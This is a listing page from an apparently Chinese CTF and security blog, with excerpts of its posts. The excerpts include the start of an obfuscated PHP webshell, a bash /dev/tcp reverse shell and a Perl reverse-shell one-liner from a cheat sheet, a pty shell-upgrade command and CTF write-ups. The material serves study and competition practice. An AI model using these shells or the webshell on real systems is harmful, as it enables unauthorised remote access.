MoR03r MoR03r's Blog
发现一个小马的利用方式
发表于 2018-10-25 | 综合
先贴代码吧 <?php $k = @$_SERVER["HTTP_DNT"]; $d = $p = ''; foreach ($_POST as $a => $b) $d.= $b; $t = eccode($d, 'DECODE', $k); $t = gzuncompress($t); $p = unserialize($t); $_POST = $p; $_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\...

阅读全文>>

护网杯ltshop题目记录
发表于 2018-10-25 | CTF
首先看一下题目首页,常规检查一遍,什么都没有发现 然后注册用户,登录查看一番 经过一番测试,发现购买大辣条的地方存在一点点的条件竞争,可以购买到5包或以上的辣条 用burp抓包,发送到intruder...

阅读全文>>

国赛半决赛(华北赛区)Web7题目解题分享
发表于 2018-10-14 | CTF
Web7解题思路 MoR03r解题思路(非预期) 打开网站后,注册一个用户登录,发现“咸鱼”这里有个上传 上传一张图片看看效果,发现会跳转到/user这个页面 比赛时,队友找到了一个非预期,就是上传...

阅读全文>>

cmd下查询3389远程桌面端口
发表于 2018-9-28 | 综合
cmd下查询3389远程桌面端口 因为要经常用到,在博客中做个笔记 在命令行下执行 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 返回: 其中的0xd3d即为端口,转为十进制...

阅读全文>>

反弹一个TTY Shell
发表于 2018-9-7 | 综合
通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文 Python python -c 'import pty; pty.spawn("/bin/sh")' 下面的方式未验证成功,Python中没有echo,如...

阅读全文>>

一个CTF题目的小结-无字母数字getFlag
发表于 2018-8-12 | CTF
前段时间看了一个比赛,题目应该算是比较旧的了 <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>50){ die("Long."); } $a = preg_match("/[A-Za-z0-9_]+...

阅读全文>>

新秀(sinsiu)cms代码审计小计
发表于 2018-7-20 | 综合
sinsiu PHP 1.0 final 不多说,先上了Seay源代码审计系统,查看了一些东西 然后跟了一下,在admin/module/file/deal.php 第69~71行这里发现没有对数据以及文件名进行任何过滤 跟进post函数,位置为include/function.php 第198~2...

阅读全文>>

国赛2018 部分题目writeup
发表于 2018-5-2 | CTF
0x01 EASYWEB 前面做题的时候一直发现这个题不能注入,后来在登录页面随手试了admin和空口令登录,抓包发现会自动填充密码,把密码去掉拿到flag。 0x02 验证码 刚开始放出这个题目的时候是点击图片的验证码,...

阅读全文>>

N1CTF-一些总结
发表于 2018-3-12 | CTF
0x00 77777 "77777" is my girlfriend's nickname,have fun xdd:) hk node:47.75.14.48 cn node:47.97.168.223 (Two challenge servers are identical, use either of them.) 做题时被burpsuite坑了好久,一直POST不过去数据,之后用hackba...

阅读全文>>

Linux下反弹shell方法总结
发表于 2017-11-16 | 综合
Bash版: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Perl版: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S"...

阅读全文>>

TOP